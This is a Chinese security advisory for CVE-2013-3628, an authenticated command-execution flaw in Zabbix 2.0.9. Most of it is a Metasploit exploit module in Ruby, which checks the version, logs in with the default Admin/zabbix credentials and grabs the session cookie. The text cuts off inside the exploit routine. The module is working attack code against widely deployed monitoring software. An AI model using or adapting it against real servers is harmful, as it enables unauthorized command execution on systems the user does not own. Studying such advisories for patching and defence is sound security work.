Zabbix任意命令执行漏洞(CVE

发布日期：2013-10-30
更新日期：2013-11-02

受影响系统：
ZABBIX ZABBIX v2.0.9
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63453
CVE(CAN) ID: CVE-2013-3628

ZABBIX是一个CS结构的分布式网络监控系统。

Zabbix 2.0.9及其他版本允许管理员在主机上运行所创建的脚本，经过身份验证的攻击者可利用此漏洞在主机上允许运行恶意脚本。

<*来源：Brandon Perry
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
    super(update_info(info,
      'Name'          => 'Zabbix Authenticated Remote Command Execution',
      'Description'    => %q{
      ZABBIX allows an administrator to create scripts that will be run on hosts.
      An authenticated attacker can create a script containing a payload, then a host
      with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host.

This module was tested againt Zabbix v2.0.9.
      },
      'License'        => MSF_LICENSE,
      'Author'        =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
        ],
      'References'    =>
        [
          ['CVE', '2013-3628'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
        ],
      'Payload'        =>
      {
        'Compat'    =>
        {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic perl ruby bash telnet Python',
        }
      },
      'Platform'      => ['unix', 'linux'],
      'Arch'          => ARCH_CMD,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 30 2013',
      'DefaultTarget'  => 0
    ))

register_options(
    [
      OptString.new('USERNAME', [ true, "Username to authenticate with", 'Admin']),
      OptString.new('PASSWORD', [ true, "Password to authenticate with", 'zabbix']),
      OptString.new('TARGETURI', [ true, "The URI of the Zabbix installation", '/zabbix/'])
    ], self.class)
  end

def check
    init = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/index.php")
    })

if !init or init.code != 200
      print_error("Could not connect to server")
      return Exploit::CheckCode::Unknown
    end

if init.body =~ /Zabbix (2\.0\.(\d)) Copyright/
      if $1 >= "2.0.0" and $1 <= "2.0.8"
      print_good("Version #{$1} is vulnerable.")
      return Exploit::CheckCode::Vulnerable
      end
    end
    return Exploit::CheckCode::Safe
  end

def exploit
    c = connect

req = c.request_cgi({
      'method' => 'POST',
      'uri' => '/zabbix/',
      'data' => 'request=&name=' << datastore['USERNAME'] << '&password=' << datastore['PASSWORD'] << '&enter=Sign+in'
    })

login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))

if !login or login.code != 302
      fail_with("Login failed")
    end

sess = login.headers['Set-Cookie']